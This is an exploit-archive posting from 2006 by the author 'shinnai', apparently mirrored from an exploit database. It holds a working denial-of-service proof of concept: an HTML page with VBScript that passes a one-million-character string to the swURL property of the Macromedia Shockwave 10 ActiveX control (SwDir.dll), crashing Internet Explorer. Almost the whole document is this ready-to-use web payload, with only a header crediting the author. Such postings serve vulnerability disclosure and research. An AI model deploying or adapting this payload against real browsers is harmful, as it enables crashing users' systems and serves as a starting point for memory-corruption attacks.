[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Macromedia Shockwave 10 (SwDir.dll) Internet Explorer Denial of Service
# Published : 2006-12-29
# Author : shinnai
# Previous Title : Macromedia Flash 8 (Flash8b.ocx) Internet Explorer Denial of Service
# Next Title : TurboFTP 5.30 Build 572 (newline/LIST) Multiple Remote DoS Exploit
<!--
---------------------------------------------------------------------------
Macromedia Shockwave 10 (SwDir.dll) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
---------------------------------------------------------------------------
-->
<html>
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='ShockW'></object>
<script language='vbscript'>
argCount = 1
arg1=String(1000000, "A")
ShockW.swURL = arg1
</script>
# www.Syue.com [2006-12-29]